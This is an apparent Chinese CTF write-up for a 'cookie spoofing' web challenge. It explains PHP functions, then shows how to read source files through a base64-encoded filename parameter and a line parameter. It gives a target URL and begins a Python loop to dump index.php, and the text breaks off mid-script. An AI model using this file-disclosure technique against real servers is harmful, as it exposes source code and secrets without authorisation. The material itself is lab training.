知识点
isset: 检测变量是否设置,并且不是 NULL
$_GET:收集来自 method=“get” 的表单里的值
intval() 函数用于获取变量的整数值。
in_array() 函数搜索数组里是否存在指定的值。
举例:
结果:
匹配已找到
file() 函数把整个文件读入一个数组里
file() 将文件作为一个数组返回。数组里的各单元都为文件里相应的一行,包括换行符在内。
解题流程
查看题目描述: cookies欺骗
打开网页
只看到很长的字符串
base64解码
通常的源文件应该是index.php
2、对index.php进行base64编码并作为新的filename的参数
3、查看源文件,其里line变量起到控制行数的作用:
http://114.67.246.176:13972/index.php?line=1&filename=aW5kZXgucGhw
4、编写python脚本,查看全部源码
import requests
rs = requests.session()
f = open("out.php", "w")
for i in range(1,30):
url